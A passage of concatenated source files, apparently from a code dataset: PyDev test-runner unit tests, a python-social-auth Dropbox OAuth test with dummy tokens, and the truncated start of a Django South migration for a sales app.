self.assert_(isinstance(suite, pydev_runfiles_unittest.PydevTestSuite))
def test_parse_cmdline(self):
sys.argv = "pydev_runfiles.py ./".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals([sys.argv[1]], configuration.files_or_dirs)
self.assertEquals(2, configuration.verbosity) # default value
self.assertEquals(None, configuration.include_tests) # default value
sys.argv = "pydev_runfiles.py ../images c:/temp".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals(sys.argv[1:3], configuration.files_or_dirs)
self.assertEquals(2, configuration.verbosity)
sys.argv = "pydev_runfiles.py --verbosity 3 ../junk c:/asdf ".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals(sys.argv[3:], configuration.files_or_dirs)
self.assertEquals(int(sys.argv[2]), configuration.verbosity)
sys.argv = "pydev_runfiles.py --include_tests test_def ./".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
self.assertEquals([sys.argv[2]], configuration.include_tests)
sys.argv = "pydev_runfiles.py --include_tests Abc.test_def,Mod.test_abc c:/junk/".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
self.assertEquals(sys.argv[2].split(','), configuration.include_tests)
sys.argv = ('C:\\eclipse-SDK-3.2-win32\\eclipse\\plugins\\org.python.pydev.debug_1.2.2\\pysrc\\pydev_runfiles.py ' +
'--verbosity 1 ' +
'C:\\workspace_eclipse\\fronttpa\\tests\\gui_tests\\calendar_popup_control_test.py ').split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals([sys.argv[-1]], configuration.files_or_dirs)
self.assertEquals(1, configuration.verbosity)
sys.argv = "pydev_runfiles.py --verbosity 1 --include_tests Mod.test_abc c:/junk/ ./".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals(sys.argv[5:], configuration.files_or_dirs)
self.assertEquals(int(sys.argv[2]), configuration.verbosity)
self.assertEquals([sys.argv[4]], configuration.include_tests)
sys.argv = "pydev_runfiles.py --exclude_files=*.txt,a*.py".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals(['*.txt', 'a*.py'], configuration.exclude_files)
sys.argv = "pydev_runfiles.py --exclude_tests=*__todo,test*bar".split()
configuration = pydev_runfiles.parse_cmdline()
self.assertEquals(['*__todo', 'test*bar'], configuration.exclude_tests)
def test___adjust_python_path_works_for_directories(self):
orig_syspath = sys.path
tempdir = tempfile.gettempdir()
pydev_runfiles.PydevTestRunner(pydev_runfiles.Configuration(files_or_dirs=[tempdir]))
self.assertEquals(1, tempdir in sys.path)
sys.path = orig_syspath[:]
def test___is_valid_py_file(self):
isvalid = self.MyTestRunner._PydevTestRunner__is_valid_py_file
self.assertEquals(1, isvalid("test.py"))
self.assertEquals(0, isvalid("asdf.pyc"))
self.assertEquals(0, isvalid("__init__.py"))
self.assertEquals(0, isvalid("__init__.pyc"))
self.assertEquals(1, isvalid("asdf asdf.pyw"))
def test___unixify(self):
unixify = self.MyTestRunner._PydevTestRunner__unixify
self.assertEquals("c:/temp/junk/asdf.py", unixify("c:SEPtempSEPjunkSEPasdf.py".replace('SEP', os.sep)))
def test___importify(self):
importify = self.MyTestRunner._PydevTestRunner__importify
self.assertEquals("temp.junk.asdf", importify("temp/junk/asdf.py"))
self.assertEquals("asdf", importify("asdf.py"))
self.assertEquals("abc.def.hgi", importify("abc/def/hgi"))
def test_finding_a_file_from_file_system(self):
test_file = "simple_test.py"
self.MyTestRunner.files_or_dirs = [self.file_dir[0] + test_file]
files = self.MyTestRunner.find_import_files()
self.assertEquals(1, len(files))
self.assertEquals(files[0], self.file_dir[0] + test_file)
def test_finding_files_in_dir_from_file_system(self):
self.assertEquals(1, len(self.files) > 0)
for import_file in self.files:
self.assertEquals(-1, import_file.find(".pyc"))
self.assertEquals(-1, import_file.find("__init__.py"))
self.assertEquals(-1, import_file.find("\\"))
self.assertEquals(-1, import_file.find(".txt"))
def test___get_module_from_str(self):
my_importer = self.MyTestRunner._PydevTestRunner__get_module_from_str
my_os_path = my_importer("os.path", True, 'unused')
from os import path
import os.path as path2
self.assertEquals(path, my_os_path)
self.assertEquals(path2, my_os_path)
self.assertNotEquals(__import__("os.path"), my_os_path)
self.assertNotEquals(__import__("os"), my_os_path)
def test_finding_modules_from_import_strings(self):
self.assertEquals(1, len(self.modules) > 0)
def test_finding_tests_when_no_filter(self):
# unittest.py will create a TestCase with 0 tests in it
# since it just imports what is given
self.assertEquals(1, len(self.all_tests) > 0)
files_with_tests = [1 for t in self.all_tests if len(t._tests) > 0]
self.assertNotEquals(len(self.files), len(files_with_tests))
def count_suite(self, tests=None):
total = 0
for t in tests:
total += t.countTestCases()
return total
def test___match(self):
matcher = self.MyTestRunner._PydevTestRunner__match
self.assertEquals(1, matcher(None, "aname"))
self.assertEquals(1, matcher([".*"], "aname"))
self.assertEquals(0, matcher(["^x$"], "aname"))
self.assertEquals(0, matcher(["abc"], "aname"))
self.assertEquals(1, matcher(["abc", "123"], "123"))
def test_finding_tests_from_modules_with_bad_filter_returns_0_tests(self):
self._setup_scenario(self.file_dir, ["NO_TESTS_ARE_SURE_TO_HAVE_THIS_NAME"])
self.assertEquals(0, self.count_suite(self.all_tests))
def test_finding_test_with_unique_name_returns_1_test(self):
self._setup_scenario(self.file_dir, include_tests=["test_i_am_a_unique_test_name"])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEquals(1, self.count_suite(filtered_tests))
def test_finding_test_with_non_unique_name(self):
self._setup_scenario(self.file_dir, include_tests=["test_non_unique_name"])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEquals(1, self.count_suite(filtered_tests) > 2)
def test_finding_tests_with_regex_filters(self):
self._setup_scenario(self.file_dir, include_tests=["test_non*"])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEquals(1, self.count_suite(filtered_tests) > 2)
self._setup_scenario(self.file_dir, ["^$"])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEquals(0, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, exclude_tests=["*"])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEquals(0, self.count_suite(filtered_tests))
def test_matching_tests(self):
self._setup_scenario(self.file_dir, None, ['StillYetAnotherSampleTest'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(1, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, ['SampleTest.test_xxxxxx1'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(1, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, ['SampleTest'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(8, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, ['AnotherSampleTest.todo_not_tested'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(1, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, ['StillYetAnotherSampleTest', 'SampleTest.test_xxxxxx1'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(2, self.count_suite(filtered_tests))
self._setup_scenario(self.file_dir, None, exclude_tests=['*'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(self.count_suite(filtered_tests), 0)
self._setup_scenario(self.file_dir, None, exclude_tests=['*a*'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(self.count_suite(filtered_tests), 6)
self.assertEqual(
set(self.MyTestRunner.list_test_names(filtered_tests)),
set(['test_1', 'test_2', 'test_xxxxxx1', 'test_xxxxxx2', 'test_xxxxxx3', 'test_xxxxxx4'])
)
self._setup_scenario(self.file_dir, None, exclude_tests=['*a*', '*x*'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
self.assertEqual(self.count_suite(filtered_tests), 2)
self.assertEqual(
set(self.MyTestRunner.list_test_names(filtered_tests)),
set(['test_1', 'test_2'])
)
self._setup_scenario(self.file_dir, None, exclude_files=['simple_test.py'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
names = self.MyTestRunner.list_test_names(filtered_tests)
self.assert_('test_xxxxxx1' not in names, 'Found: %s' % (names,))
self.assertEqual(
set(['test_abc', 'test_non_unique_name', 'test_non_unique_name', 'test_asdf2', 'test_i_am_a_unique_test_name', 'test_non_unique_name', 'test_blank']),
set(names)
)
self._setup_scenario(self.file_dir, None, include_files=['simple3_test.py'])
filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
names = self.MyTestRunner.list_test_names(filtered_tests)
self.assert_('test_xxxxxx1' not in names, 'Found: %s' % (names,))
self.assertEqual(
set(['test_non_unique_name']),
set(names)
)
def test_xml_rpc_communication(self):
notifications = []
class Server:
def __init__(self, notifications):
self.notifications = notifications
def notifyConnected(self):
#This method is called at the very start (in runfiles.py), and we do not check this here
raise AssertionError('Should not be called from the run tests.')
def notifyTestsCollected(self, number_of_tests):
self.notifications.append(('notifyTestsCollected', number_of_tests))
def notifyStartTest(self, file, test):
pass
def notifyTest(self, cond, captured_output, error_contents, file, test, time):
try:
#I.e.: when marked as Binary in xml-rpc
captured_output = captured_output.data
except:
pass
try:
#I.e.: when marked as Binary in xml-rpc
error_contents = error_contents.data
except:
pass
if error_contents:
error_contents = error_contents.splitlines()[-1].strip()
self.notifications.append(('notifyTest', cond, captured_output.strip(), error_contents, file, test))
def notifyTestRunFinished(self, total_time):
self.notifications.append(('notifyTestRunFinished',))
server = Server(notifications)
pydev_runfiles_xml_rpc.set_server(server)
simple_test = os.path.join(self.file_dir[0], 'simple_test.py')
simple_test2 = os.path.join(self.file_dir[0], 'simple2_test.py')
simpleClass_test = os.path.join(self.file_dir[0], 'simpleClass_test.py')
simpleModule_test = os.path.join(self.file_dir[0], 'simpleModule_test.py')
files_to_tests = {}
files_to_tests.setdefault(simple_test , []).append('SampleTest.test_xxxxxx1')
files_to_tests.setdefault(simple_test , []).append('SampleTest.test_xxxxxx2')
files_to_tests.setdefault(simple_test , []).append('SampleTest.test_non_unique_name')
files_to_tests.setdefault(simple_test2, []).append('YetAnotherSampleTest.test_abc')
files_to_tests.setdefault(simpleClass_test, []).append('SetUpClassTest.test_blank')
files_to_tests.setdefault(simpleModule_test, []).append('SetUpModuleTest.test_blank')
self._setup_scenario(None, files_to_tests=files_to_tests)
self.MyTestRunner.verbosity = 2
buf = pydevd_io.start_redirect(keep_original_redirection=False)
try:
self.MyTestRunner.run_tests()
self.assertEqual(8, len(notifications))
expected = [
('notifyTestsCollected', 6),
('notifyTest', 'ok', 'non unique name ran', '', simple_test, 'SampleTest.test_non_unique_name'),
('notifyTest', 'fail', '', 'AssertionError: Fail test 2', simple_test, 'SampleTest.test_xxxxxx1'),
('notifyTest', 'ok', '', '', simple_test, 'SampleTest.test_xxxxxx2'),
('notifyTest', 'ok', '', '', simple_test2, 'YetAnotherSampleTest.test_abc'),
]
if not IS_JYTHON:
if 'samples.simpleClass_test' in str(notifications):
expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpClass.',
simpleClass_test.replace('/', os.path.sep), 'samples.simpleClass_test.SetUpClassTest <setUpClass>'))
expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpModule.',
simpleModule_test.replace('/', os.path.sep), 'samples.simpleModule_test <setUpModule>'))
else:
expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpClass.',
simpleClass_test.replace('/', os.path.sep), 'simpleClass_test.SetUpClassTest <setUpClass>'))
expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpModule.',
simpleModule_test.replace('/', os.path.sep), 'simpleModule_test <setUpModule>'))
else:
expected.append(('notifyTest', 'ok', '', '', simpleClass_test, 'SetUpClassTest.test_blank'))
expected.append(('notifyTest', 'ok', '', '', simpleModule_test, 'SetUpModuleTest.test_blank'))
expected.append(('notifyTestRunFinished',))
expected.sort()
new_notifications = []
for notification in expected:
try:
if len(notification) == 6:
# Some are binary on Py3.
new_notifications.append((
notification[0],
notification[1],
notification[2].encode('latin1'),
notification[3].encode('latin1'),
notification[4],
notification[5],
))
else:
new_notifications.append(notification)
except:
raise
expected = new_notifications
notifications.sort()
self.assertEqual(
expected,
notifications
)
finally:
pydevd_io.end_redirect()
b = buf.getvalue()
if not IS_JYTHON:
self.assert_(b.find('Ran 4 tests in ') != -1, 'Found: ' + b)
else:
self.assert_(b.find('Ran 6 tests in ') != -1, 'Found: ' + b)
if __name__ == "__main__":
#this is so that we can run it frem the jython tests -- because we don't actually have an __main__ module
#(so, it won't try importing the __main__ module)
unittest.TextTestRunner().run(unittest.makeSuite(RunfilesTest))
| apache-2.0 |
ehashman/oh-mainline | vendor/packages/python-social-auth/social/tests/backends/test_dropbox.py | 92 | 1042 | import json
from social.p3 import urlencode
from social.tests.backends.oauth import OAuth1Test
class DropboxOAuth1Test(OAuth1Test):
backend_path = 'social.backends.dropbox.DropboxOAuth'
user_data_url = 'https://api.dropbox.com/1/account/info'
expected_username = '10101010'
access_token_body = json.dumps({
'access_token': 'foobar',
'token_type': 'bearer'
})
request_token_body = urlencode({
'oauth_token_secret': 'foobar-secret',
'oauth_token': 'foobar',
'oauth_callback_confirmed': 'true'
})
user_data_body = json.dumps({
'referral_link': 'https://www.dropbox.com/referrals/foobar',
'display_name': 'Foo Bar',
'uid': 10101010,
'country': 'US',
'quota_info': {
'shared': 138573,
'quota': 2952790016,
'normal': 157327
},
'email': 'foo@bar.com'
})
def test_login(self):
self.do_login()
def test_partial_pipeline(self):
self.do_partial_pipeline()
| agpl-3.0 |
alejo8591/maker | sales/migrations/0004_auto__chg_field_orderedproduct_quantity.py | 1 | 29356 | # encoding: utf-8
# Copyright 2013 maker
# License
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'OrderedProduct.quantity'
db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=30, decimal_places=2))
def backwards(self, orm):
# Changing field 'OrderedProduct.quantity'
db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=4, decimal_places=2))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.accessentity': {
'Meta': {'object_name': 'AccessEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'core.comment': {
'Meta': {'object_name': 'Comment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.User']", 'null': 'True', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"})
},
'core.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['core.Group']"})
},
'core.object': {
'Meta': {'object_name': 'Object'},
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.Comment']"}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'objects_created'", 'null': 'True', 'to': "orm['core.User']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'full_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_full_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'links': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'links_rel_+'", 'null': 'True', 'to': "orm['core.Object']"}),
'nuvius_resource': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'object_type': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'read_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_read_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'subscriptions'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Tag']", 'null': 'True', 'blank': 'True'}),
'trash': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'core.tag': {
'Meta': {'ordering': "['name']", 'object_name': 'Tag'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
'core.user': {
'Meta': {'ordering': "['name']", 'object_name': 'User', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'default_group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_user_set'", 'null': 'True', 'to': "orm['core.Group']"}),
'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_access': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'other_groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Group']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'finance.account': {
'Meta': {'ordering': "['name']", 'object_name': 'Account', '_ormbases': ['core.Object']},
'balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'balance_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'balance_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"})
},
'finance.category': {
'Meta': {'object_name': 'Category', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'finance.currency': {
'Meta': {'object_name': 'Currency', '_ormbases': ['core.Object']},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'factor': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '10', 'decimal_places': '4'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'symbol': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'})
},
'finance.liability': {
'Meta': {'ordering': "['-due_date']", 'object_name': 'Liability', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'finance.tax': {
'Meta': {'object_name': 'Tax', '_ormbases': ['core.Object']},
'compound': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
'finance.transaction': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'Transaction', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'liability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Liability']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'identities.contact': {
'Meta': {'ordering': "['name']", 'object_name': 'Contact', '_ormbases': ['core.Object']},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.ContactType']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['identities.Contact']"}),
'related_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.AccessEntity']", 'null': 'True', 'blank': 'True'})
},
'identities.contactfield': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactField', '_ormbases': ['core.Object']},
'allowed_values': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'field_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'identities.contacttype': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactType', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['identities.ContactField']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sales.lead': {
'Meta': {'ordering': "['contact']", 'object_name': 'Lead', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_lead_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'contact_method': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.opportunity': {
'Meta': {'ordering': "['-expected_date']", 'object_name': 'Opportunity', '_ormbases': ['core.Object']},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'amount_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
